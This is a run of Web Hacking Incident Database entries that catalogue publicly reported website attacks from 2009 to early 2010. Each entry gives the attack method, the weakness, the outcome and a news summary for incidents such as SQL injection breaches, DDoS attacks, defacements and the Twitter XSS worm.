Reference: http://bdnews24.com/details.php?id=156315&cid=2
Attack Source Geography: India
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-16: The Game's Email Hacked, Monthly Expenses List Leaked
WHID ID: 2010-16
Date Occured: 3/22/2010
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: Hackers don't discriminate. The biggest targets these days seem to be celebrities. The latest is rapper The Game, whose GMAIL account was reportedly hacked into recently. According to TheBoomBox.com, the rapper didn't have too many interesting things going on in his email. At least, nothing revealed just yet. The only thing of interest leaked was a detailed list of his monthly expenses, which total roughly $52,000.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ballerstatus.com/2010/03/22/the-games-email-hacked-monthly-expense-list-leaked/
Attack Source Geography:
Attacked System Technology: GMail
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-15: Villar website 'hacked'
WHID ID: 2010-15
Date Occured: 3/19/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Philippines
Incident Description: The rivalry between Senators Manny Villar and Benigno "Noynoy" Aquino has gone beyond the campaign trail as the official website of the Nacionalista Party presidential bet supposedly got hacked by an Aquino supporter Monday. At about 10 a.m., Villar's official website www.mannyvillar.co.ph contained a blog entry titled "Hacked by Kris Aquino." The entry, which was written in "swardspeak", took jabs at Villar's marketing strategy and ended up coaxing its readers to vote for Aquino instead.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.abs-cbnnews.com/lifestyle/03/22/10/villar-website-hacked
Attack Source Geography: Philippines
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-14: Dismantling of Saudi-CIA Web site illustrates need for clearer cyberwar policies
WHID ID: 2010-14
Date Occured: 3/19/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Saudi Arabia
Incident Description: A very interesting cyberwarfare story involving US government/military on both sides. By early 2008, top U.S. military officials had become convinced that extremists planning attacks on American forces in Iraq were making use of a Web site set up by the Saudi government and the CIA to uncover terrorist plots in the kingdom. Elite U.S. military computer specialists, over the objections of the CIA, mounted a cyberattack that dismantled the online forum.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.washingtonpost.com/wp-dyn/content/article/2010/03/18/AR2010031805464.html
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-13: Australian Government websites blitzed by DDoS attack
WHID ID: 2010-13
Date Occured: 2/10/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography: Australia
Incident Description: The websites of Senator Stephen Conroy and the Australian Parliament House were inaccessible this morning after the 'Anonymous' group of hackers claimed credit for a Distributed Denial of Service (DDoS) attack on Australian Government web sites.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.securecomputing.net.au/News/166860,australian-government-websites-blitzed-by-ddos-attack.aspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-12: Army Website Compromised Through SQL Injection
WHID ID: 2010-12
Date Occured: 1/9/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: A Romanian grey hat hacker has disclosed an SQL injection (SQLi) vulnerability on a website belonging to the United States Army, which leads to full database compromise. The website, called Army Housing OneStop, is used to provide information about military housing facilities to soldiers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Army-Website-Compromised-Through-SQL-Injection-131649.shtml
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-11: U.S. Military Equipment Website Hacked
WHID ID: 2010-11
Date Occured: 1/13/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: A Lebanese hacker is taking credit for a security breach on the PEO Soldier Army website. By exploiting an SQL injection vulnerability, he allegedly obtained full access to the underlying database and the information contained within.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/U-S-Military-Equipment-Website-Hacked-131947.shtml
Attack Source Geography: Lebanon
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-10: FBI, police ID Boulder synagogue Web site hacker
WHID ID: 2010-10
Date Occured: 1/2/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Religious
Attacked Entity Geography: Boulder, CO
Incident Description: Boulder police and the FBI announced Friday that they have identified the individual who hacked into the Web sites of two Boulder synagogues and the Boulder Rabbinic Council last week and defaced them with anti-Semitic messages.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.dailycamera.com/ci_14150610?source=most_emailed#axzz0ieLUTxxC
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-9: Pakistani cyber crime website hit by hacker who is able to access database
WHID ID: 2010-9
Date Occured: 1/11/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Pakistan
Incident Description: Details have been reported of a political website, the Pakistani National Response Center for Cyber Crimes, part of the Federal Investigation Authority, being hacked: the sensitive site was hit by a hacker who managed to gain access to the email database.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineuk.com/pakistani-cyber-crime-website-hit-by-hacker-who-is-able-to-access-database/article/160969/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-8: Cross-site scripting vulnerabilities see two political websites hacked
WHID ID: 2010-8
Date Occured: 1/5/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Spain
Incident Description: A report on BBC News said that visitors to Spain's EU presidency website were greeted by an image of comedy character Mr Bean instead of the Spanish Prime Minister Jose Luis Rodriguez Zapatero. The government said that the site - www.eu2010.es - had not been attacked and that a hacker had taken a screenshot of the homepage to make a photo montage using a cross-site scripting (XSS) vulnerability. Visitors found an image of Mr Bean complete with a benign smile and the words 'Hi there'.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineuk.com/cross-site-scripting-vulnerabilities-see-two-political-websites-hacked/article/160597/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-7: Hacker attacks Ceridian; data from 27,000 at risk
WHID ID: 2010-7
Date Occured: 1/20/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Minnesota, USA
Incident Description: A hacker attack at payroll processing firm Ceridian Corp. of Bloomington has potentially revealed the names, Social Security numbers, and, in some cases, the birth dates and bank accounts of 27,000 employees working at 1,900 companies nationwide. The attack was against the Powerpay payroll system.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.startribune.com/business/83505102.html?elr=KArksUUUU
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 27000
Additional Link:
Entry Title: WHID 2010-6: Cyber hacker hits Paula Dockery's campaign site
WHID ID: 2010-6
Date Occured: 1/20/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Florida, USA
Incident Description: Attacker(s) conducted a DDoS attack against the Florida Candidate for Governor Paula Dockery's website. In essence, what is happening is someone is sending approximately 40,000 requests per second to the website/server, then immediately closing them… It is the equivalent of 2.4 million people a minute browsing to the site and closing it immediately. In essence this saturates the number of connections available to legitimate people trying to get to the server, causing them to time-out when they visit the site. In security terms it is called a Denial of Service Attack (DoS).
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.tampabay.com/buzz/2010/01/cyber-hacker-hits-paula-dockerys-campaign-site.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-5: City of Albertville's web site hacked
WHID ID: 2010-5
Date Occured: 3/18/2010
Attack Method: Unknown
Application Weakness:
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Alabama, USA
Incident Description: The website of the Mayor of Albertville, AL was defaced with profanity.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.waff.com/Global/story.asp?S=12166330
Attack Source Geography: Alabama, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-4: Shopping website hacked with malware
WHID ID: 2010-4
Date Occured: 3/19/2010
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: Australia
Incident Description: Australian retailer DealsDirect.com.au started serving malware to clients through a compromised partner advertising system. It seems that end users were made aware of malware due to Google Safe Browsing plugins in Google Chrome, Firefox and Internet Explorer browsers as they were alerted with the "This site may harm your computer" warning. It is a shame that web sites themselves aren't doing better at analyzing outbound data they are serving to ensure that it is not malicious.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.ninemsn.com.au/technology/1029568/shopping-website-hacked-with-malware
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-3: Feds Crack Hackers' Stock Manipulation Cybercrime
WHID ID: 2010-3
Date Occured: 3/16/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography:
Incident Description: Hackers, working for BroCo Investments (a one-trader operation based in St. Petersburg, Russia) used stolen online brokerage credentials to initiate a pump-and-dump scheme. Within minutes of making the unauthorized transactions, the SEC claims BroCo then sold shares of these same stocks held in its own account at the artificially inflated prices, netting the hackers more than $250,000 in profits. From a defensive perspective, the online brokerage accounts should be doing more to authenticate users and validate transactions. The challenging part is that these types of defensive mechanisms may actually interfere with many of the automated bot programs that investors use to monitor and execute trades. Online trading fraud is not going to go away anytime soon. Read More on SEC filing - http://www.wired.com/images_blogs/threatlevel/2010/03/brocosec.pdf
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.esecurityplanet.com/news/article.php/3871176/Feds-Crack-Hackers-Stock-Manipulation-Cybercrime.htm
Attack Source Geography: St. Petersburg, Russia
Attacked System Technology:
Cost: $600000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-2: Hacker Disables More Than 100 Cars Remotely
WHID ID: 2010-2
Date Occured: 3/17/2010
Attack Method: Administration Error
Application Weakness: Insufficient Authorization
Outcome: Data Loss
Attacked Entity Field: Automotive
Attacked Entity Geography: Austin TX, USA
Incident Description: Hundreds of cars would not start and/or had their horn honking when a former employee at Texas Auto Center used previous passwords to log into a system called Webtech Plus, which is used as an alternative to repossessing vehicles that haven't been paid for. Operated by Cleveland-based Pay Technologies, the system lets car dealers install a small black box under vehicle dashboards that responds to commands issued through a central website, and relayed over a wireless pager network. The dealer can disable a car's ignition system, or trigger the horn to begin honking, as a reminder that a payment is due. The hacker destroyed account records and then started to disable cars/force the horn to honk continuously. Read More http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/#ixzz0iYvPwUVj
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/
Attack Source Geography: Texas, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-1: Hacker Breaks Into 49 House Sites, Insults Obama
WHID ID: 2010-1
Date Occured: 2/1/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: A hacker broke into 49 House Web sites of both political parties after President Obama's State of the Union address. The websites were all managed by a private vendor -- GovTrends of Alexandria, Va. The article mentions that "GovTrends let its guard down while performing an update, allowing the hacker to penetrate sites of individual members and committees overnight" which leads to WHID's Misconfiguration Attack Method designation. Interesting note - 18 House sites managed by GovTrends were defaced last August.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.toptechnews.com/news/Hacker-Breaks-Into-49-House-Sites/story.xhtml?story_id=00100041BAO7
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-51: Hacker Hits RBS WorldPay Systems Database
WHID ID: 2009-51
Date Occured: 9/11/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Georgia, USA
Incident Description: A Romanian hacker well-known for discovering SQL injection vulnerabilities in high-profile Websites has struck again -- this time on RBS WorldPay's site, where he says he hit the jackpot, the company's database. The hacker, who goes by "Unu," says he accessed RBS WorldPay's database via a SQL injection flaw in one of its Web applications. RBS WorldPay maintains Unu accessed a test database that didn't carry any live data, and that no merchant or cardholder data accounts were compromised. The company has since taken down the pages.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.darkreading.com/database_security/security/app-security/showArticle.jhtml?articleID=220000005
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-50: Iranian hacker attack: What will it cost Twitter?
WHID ID: 2009-50
Date Occured: 12/17/2009
Attack Method: DNS Hijacking
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: A new attack by hackers Dec. 17 redirected Twitter users to a page from a previously unknown group called the Iranian Cyber Army. Most computer attacks are relatively straightforward denial-of-service attacks, where computers overwhelm a website with data to bring it down. Thursday night's attack against Twitter was more serious because the hackers gained access to part of Twitter's network and were able to redirect users to a page with a photo of a flag with Farsi script. Near the top of the page ran a bold red headline in English: "This site has been hacked by Iranian Cyber Army." Hackers for several days have attacked the websites of opponents of Iran's regime and posted the same image. The opponents have used social-media sites like Twitter to organize street protests this year.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.csmonitor.com/Money/2009/1218/Iranian-hacker-attack-What-will-it-cost-Twitter
Attack Source Geography: Iran
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-49: RockYou Hack: From Bad To Worse
WHID ID: 2009-49
Date Occured: 12/14/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Earlier today news spread that social application site RockYou had suffered a data breach that resulted in the exposure of over 32 Million user accounts. To compound the severity of the security breach, it was found that RockYou are storing all user account data in plain text in their database, exposing all that information to attackers. RockYou have yet to inform users of the breach, and their blog is eerily silent – but the details of the security breach are going from bad to worse.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-48: XSS Embedded iFrames
WHID ID: 2009-48
Date Occured: 12/14/2009
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe to a malicious webpage redirector. To an unknowing user following such an advertisement, they would believe that they were just visiting the intended host site unaware that the iframe was also redirecting them to malicious content.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://research.zscaler.com/2009/12/xss-embedded-iframes.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-47: Morrison says 'new baby' story a hoax by web hacker
WHID ID: 2009-47
Date Occured: 12/29/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: A hoax, posted by a hacker on Van Morrison's website, falsely claimed the singer (64) had a baby with a woman called Gigi Lee. But the reclusive singer issued a statement on New Year's Eve saying he is happily married to former model Michelle Rocca. The earlier reports were carried by news organisations worldwide after a Los Angeles based public relations consultant, who has represented Morrison in the past, apparently confirmed the claim on Tuesday. However, the statement issued by Van Morrison said: "I have asked my management team to carry out an immediate investigation into a hacking attack which took place on my website on December 29th last. This is the second occasion on which the website has been hacked into during the last three months. In this most recent incident, claims were made relating to my personal life in a 'statement' purporting to come from me."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.independent.ie/national-news/morrison-says-new-baby-story-a-hoax-by-web-hacker-1996333.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-46: Clickjacking Attack Hit Facebook
WHID ID: 2009-46
Date Occured: 12/23/2009
Attack Method: Clickjacking
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: The Facebook clickjacking assault appeared as a comment posted to the account of a user along with a photograph, which enticed him to click it. On clicking the link, it led the user to a web page which pretended to be a CAPTCHA test. It also prompted him to click a blue button labelled "Share" embedded in the Facebook web page. But on clicking it, the victim was diverted to a YouTube video that then appeared on his Facebook account. Consequently, the victim and his contacts were infected. Krzysztof Kotowicz, a freelance security researcher, states that presently the attack is effective merely in the Chrome and Firefox web browsers, as reported by Help Net Security on December 22, 2009.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.spamfighter.com/News-13684-Clickjacking-Attack-Hit-Facebook.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-45: Vaserv Hacked and Owner Commits Suicide Over Data Loss
WHID ID: 2009-45
Date Occured: 6/10/2009
Attack Method: Various
Application Weakness: Unknown
Outcome: Data Loss
Attacked Entity Field: Service Providers
Attacked Entity Geography:
Incident Description:

This must be the worst incident reported by the Web Hacking Incident Database.

We all know that web security is highly important but neglected. We tell frightening stories but listeners think they are only "FUD": fear, uncertainty and doubt, used to sell products and services. I hope that the VAServ incident will serve to warn that those are not fairytale stories. Even so, I wish this one would not have happened.

In this story, like most calamities, it seems that the laymen suffer: small entrepreneurs & upstart companies who lost everything in a hacking incident. One of them even lost his life.

Vaserv web site reporting recovery status, June 10th:
22:19 vz47uk restored
22:21 vz46uk data loss
22:42 Please allow upto 2 hours for a ticket response as currently we have 200+ active tickets
23:02 vz67uk data loss
23:20 vz50uk data restored
23:23 vz51uk data loss
00:03 FsckVPS server26 and server27 are still being worked on, but data *appears* to be intact

It all started on Sunday, June 7th: someone broke into the web servers of VAServ, a tiny UK based hosting company. The hackers ruined many of VAServ's virtual servers. Some of them were lost for ever, as the snippet from VAServ's home page, serving as an emergency bulletin board, shows.

As tiny as VAServ is, probably no more than 3 people, in today's virtual and flat world they could serve tens of thousands of low cost web sites, many of them now lost for ever. Behind each one of these web sites there is a story of someone who worked hard, whether on a hobby or a small business and is now left with nothing. A comment made on one of the blog entries about the incident reads:

"yeah thanks for ruining my life for the last 2 years i had built up my site spending alot of money and giving up my job for nothing.........what am i going to tell the wife?"

Just think about tens of thousands of such stories. Daniel Voyce, a web developer using VAServ for all of his clients, told the Register:

"Since last night, I've had probably 40 phone calls from clients saying 'Why is my website down, It's making me look bad."

But this domino effect ruining so many small businesses had another, even more devastating angle. Just days before the hack, someone posted on milw0rm a long list of yet unpatched vulnerabilities in Kloxo, a virtual machine management software. The list certainly looks comprehensive enough to enable anyone to penetrate a site using Kloxo, which VAServ was, leading VAServ and others to believe that LxLabs, the Bangalore-based software company behind Kloxo, is the culprit. Somebody claiming to be the hacker commented on the Inquisitr blog, claiming that weak passwords at VAServ were to blame for the hack, which Rus Foster from VAServ denied.

We may never know who is right and who is wrong. LxLabs, just like VAServ, is a tiny company using the Internet to look big. However, one area that suffers a lot in small companies is their security. It is never important enough to invest resources in security in such lean and mean operations.

But tiny giants have another weakness: it all falls on the shoulders of too few people. In the case of LxLabs, on KT Ligesh, the CEO. Ligesh committed suicide just a day after the hack for which his company was blamed. While already a troubled person, one cannot escape the thought that the hacking incident was the last straw.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.inquisitr.com/25617/update-new-information-on-the-vaserv-hack-that-wiped-100k-sites/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-43: Web Mail Company to Pay Prize After CEO Hacked
WHID ID: 2009-43
Date Occured: 6/10/2009
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Monetary Loss
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description: What does a challenge to break a web mail system and get $10,000, broken within minutes, prove? Is it a lesson in vanity? Or about the state of web security? Or about security in general? Probably all. The most obvious observation is that offering $10,000 to anyone who can break your site, and being broken within an hour, shows that you don't know what you're talking about. Maybe it would be a lesson to all security vendors not to believe their own marketing verbiage. A quick browse of the bugtraq vulnerability archives will show how insecure and easy to evade security products can be. However, judging from the number and seriousness of the incidents reported in the Web Hacking Incidents Database, StrongWebmail is not alone, and far stronger companies suffer severe incidents, making web applications the weakest link in an organization's information security. Lastly, we should always remember that there is never perfect security. By making systems more secure we are just raising the price required to attack them and lowering the damage of such an attack, but never. As the old joke goes: the only secure system is one without users.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.strongwebmail.com/secure/email/contests/hack/tc
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-42: Puerto Rico sites redirected in a DNS attack
WHID ID: 2009-42
Date Occured: 4/27/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Internet
Attacked Entity Geography: US
Incident Description: Attacking web sites by going to the source, targeting DNS servers rather than the web sites themselves, shows both the boldness of hackers and the fragility of the Internet. While not new, DNS hijacking attacks took an important turn this year, showing how much we rely on the web and how little we care for its protection. In the past DNS hijacking required complete control over the DNS server. In recent years most applications are controlled through a web interface, including DNS servers. Earlier this year attackers found an XSS vulnerability in a common DNS platform to hijack unused DNS entries for phishing. But this was only a small prelude to the real thing. CNet reports that this time hackers took over an entire TLD (Top Level Domain, or country) DNS server using SQL injection, virtually defacing the Puerto Rican sites of companies such as Google and Microsoft. The amazing story unfolds in the comments to the CNet story, which outline a mischievous professor and slow authorities who let him privatize and monetize domain registration in Puerto Rico without any control. The question we are left with is whether other countries and geographies are any different. Or even other industries, for that matter?
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-1009_3-10228436-83.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-41: Malware in Advertising at Digital Spy
WHID ID: 2009-41
Date Occured: 6/2/2009
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description: The Register reports that Digital Spy, a high profile UK gossip site, carried malware-inflicting banner ads. Digital Spy has acknowledged the issue and said it promptly addressed it; however, details on the source of the malicious banners are still not available. Malware distribution through ad programs is a borderline phenomenon. While there is no question that malware distribution is malicious, and in most geographies illegal, in many cases the site owners are not technically responsible for the content of the ads they serve, as the ad content comes directly from a 3rd party. The question of whether they are legally responsible is open. Another issue is defining malware. Many times ads are used to entice users to download and install programs that are questionable. A rootkit installed through a known browser vulnerability is malware; however, the distinction between adware and malware is many times blurred and depends on: the ratio between benefit to the user and benefit to the software distributor; the clarity with which the benefit to the software distributor is explained to the user; and lastly, the legality of this benefit.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2009/06/02/digital_spy_malware/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-40: SQL injection Hits Sensitive US Army servers
WHID ID: 2009-40
Date Occured: 1/26/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Information Week reports that a well known Turkish hacker penetrated two sensitive US Army servers, one at the McAlester Ammunition Plant in McAlester, Okla., and the other at the U.S. Army Corps of Engineers' Transatlantic Center in Winchester, Va. The hacks are currently under criminal investigation by Defense Department officials. The breaches were not publicly disclosed and the level of exposure is therefore not known. It is known, however, that web site visitors were redirected to a site protesting against climate change. The Register speculates that the attack method was SQL injection.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.informationweek.com/news/government/federal/showArticle.jhtml?articleID=217700619
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-39: Uno is back: 245,000 records stolen from Orange France using SQL injection
WHID ID: 2009-39
Date Occured: 5/26/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Service Providers
Attacked Entity Geography: France
Incident Description: After focusing earlier this year on Anti-Virus vendors, Uno, the Romanian Hacker is now back and reports in his blog that an Orange France web site dedicated to photo management is vulnerable to SQL injection and that he was able to access 245,000 records from the web site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.hackersblog.org/2009/05/25/orange-is-so-cool/
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 245000
Additional Link:
Entry Title: WHID 2009-38: Time's Poll For Most Influencial Hacked
WHID ID: 2009-38
Date Occured: 4/15/2009
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Link Spam
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

Polls are an easy target for automation abuse. You can usually participate anonymously, and the poll operator has an interest in drawing as many participants as possible, but as demonstrated by previous incidents, such loose security enables hackers to distort the results.

This time a hacker succeeded in manipulating Time's poll for most influential people in 2009.

Top results for the hacked Time poll

Such polls are probably always distorted by automated programs, with every stakeholder running his own robot to promote a cause. The current Time poll status shown above includes mostly known people, though the standings do seem skewed. Is it just that our view of the world is different from others', or have Muslims around the world become avid Time readers? The top rated person, "moot", whom none of you had heard about until now, proves that it is all about automation.

This specific poll distortion, reported by Paul Lamere, is unique since a group of hackers called 4chan, led by "moot", took the time to fight Time's humble attempts to mitigate automation. Among the measures and countermeasures that 4chan and Time exchanged are:

  • 4chan distributed the simple GET URL required to vote for moot through legitimate web sites and comment spamming. Such a link can easily be executed automatically by a web site user without his awareness using CSRF techniques.
  • Using a typical CSRF countermeasure, Time added a salted and hashed key to ensure that the poll was submitted from its own poll form. However, the key was generated on the client by Time's poll Flash application, enabling 4chan to easily find it out and overcome the issue.
  • The Time voting mechanism did not even check that the ranking in the vote was legal, so a link to vote down "moot"'s competitors in the list was also used until Time fixed the issue. Voting down is key to winning such a poll, as 4chan's competitors were not resting, running their own sophisticated campaigns.
  • Lastly, 4chan developed sophisticated robots to auto-vote. Those robots overcome Time's anti-automation protections: since each user is allowed to vote just once every 13 seconds, the robots use open proxies to vote faster. Since Time only prevents voting for the same person from the same IP, the robots used the extra 12 seconds available for each source IP to vote down competitors. The system also reports to a central server, allowing monitoring of the voting rate!

Rate of voting for "rain" as recorded by 4chan monitoring

However, this specific hack is even more interesting. At one point 4chan were bored with just running moot for presidency, so they decided to use their sophisticated machine to do more elaborate work. They decided to fix the first 21 nominees so that their initials would spell "Marblecake Also the Game". And as Paul Lamere's screenshot proves, they made it.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2009/04/17/time_top_100_hack/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-37: Twitter XSS/CSRF worm series (Updated)
WHID ID: 2009-37
Date Occured: 4/11/2009
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

Update (Apr 19th 2009) - The initial Mooney Twitter worm has evolved into a series of 5 worms at the time of writing, each exploiting a different vulnerability in Twitter. The latest one specifically focuses on Twitter accounts that have a high number of followers, thus targeting celebrities such as Ashton Kutcher and Oprah Winfrey, according to Graham Cluley from Sophos.

The hack seems to have paid off for Mikeyy Mooney, who was hired as a security consultant following the incident.


Twitter is in the spotlight again. Mikeyy Mooney, the 17-year-old creator of StalkDaily.com, a Twitter alternative, admitted to hacking his giant competitor by implementing a worm that propagated itself through Twitter, making every affected user tweet about StalkDaily. Mikeyy certainly got the advertising and page views he was looking for.

Mikeyy Mooney, the Twitter worm's creator

Mikeyy's worm is a good example of how CSRF and XSS can be combined to create a strong blended attack, in this case a propagating worm. A Web 2.0 community-generated site such as Twitter is often vulnerable to stored XSS. This often implies that a user can update his own profile with malicious code, and as a result others who view his content get hit. Without any other vulnerability to complicate things, you are safe as long as your friends are trustworthy.

